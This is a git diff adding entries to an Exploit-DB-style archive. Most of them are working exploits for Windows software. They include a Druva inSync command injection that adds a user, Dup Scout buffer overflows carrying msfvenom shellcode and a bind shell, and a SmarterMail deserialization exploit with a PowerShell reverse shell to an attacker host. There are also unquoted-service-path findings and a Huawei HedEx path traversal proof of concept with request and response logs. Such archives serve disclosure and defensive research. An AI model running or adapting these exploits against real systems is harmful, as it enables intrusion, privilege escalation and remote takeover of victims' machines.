+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+
+C:\Users\m507>sc qc "RumbleService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: RumbleService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Rumble\rumble_win32.exe --service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Rumble Mail Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49205.txt b/exploits/windows/local/49205.txt
new file mode 100644
index 000000000..69f50d3c0
--- /dev/null
+++ b/exploits/windows/local/49205.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 05-12-2020
+# Vendor Homepage: https://www.kite.com/
+# Software Links : https://www.kite.com/download/
+# Tested Version: 1.2020.1119.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+KiteService	KiteService	C:\Program Files\Kite\KiteService.exe	Auto
+
+
+C:\>sc qc "KiteService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: KiteService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : KiteService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49211.ps1 b/exploits/windows/local/49211.ps1
new file mode 100644
index 000000000..13589ac59
--- /dev/null
+++ b/exploits/windows/local/49211.ps1
@@ -0,0 +1,32 @@
+# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
+# Date: 2020-12-03
+# Exploit Author: 1F98D
+# Original Author: Matteo Malvica
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
+# Version: 6.6.3
+# Tested on: Windows 10 (x64)
+# CVE: CVE-2020-5752
+# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
+# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
+
+$ErrorActionPreference = "Stop"
+
+$cmd = "net user pwnd /add"
+
+$s = New-Object System.Net.Sockets.Socket(
+    [System.Net.Sockets.AddressFamily]::InterNetwork,
+    [System.Net.Sockets.SocketType]::Stream,
+    [System.Net.Sockets.ProtocolType]::Tcp
+)
+$s.Connect("127.0.0.1", 6064)
+
+$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
+$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
+$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
+$length = [System.BitConverter]::GetBytes($command.Length);
+
+$s.Send($header)
+$s.Send($rpcType)
+$s.Send($length)
+$s.Send($command)
\ No newline at end of file
diff --git a/exploits/windows/local/49226.txt b/exploits/windows/local/49226.txt
new file mode 100644
index 000000000..089479935
--- /dev/null
+++ b/exploits/windows/local/49226.txt
@@ -0,0 +1,37 @@
+# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
+# Discovery by: Zaira Alquicira
+# Discovery Date: 2020-12-10
+# Vendor Homepage:  https://pdf-complete.informer.com/3.5/
+# Tested Version: 3.5.310.2002
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v
+"""
+
+PDF Complete
+
+PDF Complete  C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+/startedbyscm:66B66708-40E2BE4D-pdfcService
+Auto
+
+
+# Service info:
+
+C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: pdfcDispatcher
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+/startedbyscm:66B66708-40E2BE4D-pdfcService
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : PDF Document Manager
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py
index 7c881a738..3b65609ac 100755
--- a/exploits/windows/remote/46697.py
+++ b/exploits/windows/remote/46697.py
@@ -71,6 +71,8 @@ def SendString(string,ip):
     for char in string:
         target = socket(AF_INET, SOCK_DGRAM)
         target.sendto(characters[char],(ip,1978))
+        sleep(0.5)
+
     
 
 
diff --git a/exploits/windows/remote/49210.py b/exploits/windows/remote/49210.py
new file mode 100755
index 000000000..809e75ea0
--- /dev/null
+++ b/exploits/windows/remote/49210.py
@@ -0,0 +1,63 @@
+# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
+# Requires web service to be enabled.
+# Tested on Windows 10 Pro (x64)
+# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
+# Credits: Tulpa and SICKNESS for original exploits
+# Modified: @0rbz_
+
+import socket,os,time,struct,argparse,sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required=True)
+args = parser.parse_args()
+
+host = args.host
+port = 80
+
+# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
+
+buf =  ""
+buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
+buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
+buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
+buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
+buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
+buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
+buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
+buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
+buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
+buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
+buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
+buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
+buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
+buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
+buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
+buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
+buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"
+
+buffer = "\x41" * 260
+buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
+buffer += "\x90" * 20
+buffer += buf
+buffer += "\x90" * (10000 - len(buffer))
+
+evil =  "POST /online_registration HTTP/1.1\r\n"
+evil += "Host: " + sys.argv[2] +"\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "customer_name=" + buffer
+evil += "&unlock_key=" + buffer + "\r\n"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((host,port))
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/49216.py b/exploits/windows/remote/49216.py
new file mode 100755
index 000000000..7f4d494fb
--- /dev/null
+++ b/exploits/windows/remote/49216.py
@@ -0,0 +1,56 @@
+# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
+# Exploit Author: 1F98D
+# Original Author: Soroush Dalili
+# Date: 10 May 2020
+# Vendor Hompage: re
+# CVE: CVE-2019-7214
+# Tested on: Windows 10 x64
+# References:
+# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
+# 
+# SmarterMail before build 6985 provides a .NET remoting endpoint
+# which is vulnerable to a .NET deserialisation attack.
+#
+#!/usr/bin/python3
+​
+import base64
+import socket
+import sys
+from struct import pack
+​
+HOST='192.168.1.1'
+PORT=17001
+LHOST='192.168.1.2'
+LPORT=4444
+​
+psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
+psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
+psh_shell = base64.b64encode(psh_shell)
+psh_shell = psh_shell.ljust(1360, b' ')
+​
+payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
+payload = base64.b64decode(payload)
+payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
+​
+uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
+​
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((HOST,PORT)) 
+​
+msg = bytes()
+msg += b'.NET'                 # Header
+msg += b'\x01'                 # Version Major
+msg += b'\x00'                 # Version Minor
+msg += b'\x00\x00'             # Operation Type
+msg += b'\x00\x00'             # Content Distribution
+msg += pack('I', len(payload)) # Data Length
+msg += b'\x04\x00'             # URI Header
+msg += b'\x01'                 # Data Type
+msg += b'\x01'                 # Encoding - UTF8
+msg += pack('I', len(uri))     # URI Length
+msg += uri                     # URI
+msg += b'\x00\x00'             # Terminating Header
+msg += payload                 # Data
+​
+s.send(msg)
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/49217.py b/exploits/windows/remote/49217.py
new file mode 100755
index 000000000..176d16be5
--- /dev/null
+++ b/exploits/windows/remote/49217.py
@@ -0,0 +1,70 @@
+# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
+# Date: 2020-12-08
+# Exploit Author: Andrés Roldán
+# Vendor Homepage: http://www.dupscout.com
+# Software Link: http://www.dupscout.com/downloads.html
+# Version: 10.0.18
+# Tested on: Windows 10 Pro x64
+
+#!/usr/bin/env python3
+
+import socket
+import struct
+
+HOST = '127.0.0.1'
+PORT = 80
+
+# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL
+SHELL =  b""
+SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
+SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4"
+SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4"
+SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8"
+SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc"
+SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2"
+SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41"
+SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9"
+SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91"
+SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5"
+SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b"
+SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4"
+SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca"
+SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7"
+SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28"
+SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb"
+SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0"
+SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90"
+SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7"
+SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7"
+SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe"
+SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7"
+SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57"
+SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4"
+SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6"
+SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6"
+SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25"
+SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec"
+SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa"
+SHELL += b"\xfa\xa9\x3b\x45"
+
+PAYLOAD = (
+    b'\x90' * (2482 - len(SHELL)) +
+    SHELL +
+    b'\xeb\x10\x90\x90' +
+    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
+    struct.pack('<L', 0x1002071c) +
+    b'\x90' * 32  +
+    b'\xE9\x4D\xF6\xFF\xFF' +
+    b'C' * (10000 - 2482 - 4 - 32 - len(SHELL))
+)
+
+HTTP_PAYLOAD = (
+    b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' +
+    b'Host: ' + HOST.encode() +
+    b'\r\n\r\n'
+)
+
+with socket.create_connection((HOST, PORT)) as fd:
+    print('[+] Sending payload...')
+    fd.sendall(HTTP_PAYLOAD)
+    print('[+] Done. Check for a shell on port 4444.')
\ No newline at end of file
diff --git a/exploits/windows/remote/49218.txt b/exploits/windows/remote/49218.txt
new file mode 100644
index 000000000..ad386c027
--- /dev/null
+++ b/exploits/windows/remote/49218.txt
@@ -0,0 +1,303 @@
+# Exploit Title: Huawei HedEx Lite 200R006C00SPC005 - Path Traversal
+# Date: 2020-11-24
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://www.huawei.com/
+# Software Link: https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
+# Version: 200R006C00SPC005
+
+Document Title:
+===============
+Huawei HedEx Lite (DM) - Path Traversal Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2268
+
+
+Release Date:
+=============
+2020-11-24
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2268
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+Directory- or Path-Traversal
+
+
+Current Estimated Price:
+========================
+3.000€ - 4.000€
+
+
+Product & Service Introduction:
+===============================
+https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
+
+
+Abstract Advisory Information:
+==============================
+A vulnerability laboratory core team researcher discovered a path
+traversal vulnerability in the Huawei HedEx Lite v200R006C00SPC005.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-24: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+An exploitable path traversal vulnerability has been discovered in the
+official Huawei HedEx Lite v200R006C00SPC005.
+Attackers can able to request local files or resources by remote
+requesting to unauthorized change a local path.
+
+
+Proof of Concept (PoC):
+=======================
+The path traversal vulnerability can be exploited by remote attackers
+with restricted system user privileges wihtout user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Vulnerable File(s):
+./newOtherManageContent.cgi [URL Path Filename]
+./newStartupHedExBeeAction.cgi [URL Path Filename]
+./newprehomeadvsearch.cgi [URL Path Filename]
+
+
+--- PoC Session Logs [POST Method Request] ---
+URL:
+http://localhost:7890/newOtherManageContent.cgi/................................windowswin.ini
+Path:
+/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
+HTTP/1.1
+Host: localhost:7890
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101
+Firefox/27.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:7890/newindex.cgi
+Connection: close
+Content-Length: 0
+
+
+ --- PoC Session Logs [Response] ---
+HTTP/1.1 200 OK
+Content-Disposition: attachment; filename="win.ini"
+Content-Length: 1801
+Content-Type: application/octet-stream;charset=utf-8
+X-Frame-Options: SAMEORIGIN
+-
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+CMCDLLNAME32=mapi32.dll
+CMC=1
+MAPIX=1
+MAPIXVER=1.0.0.1
+OLEMessaging=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
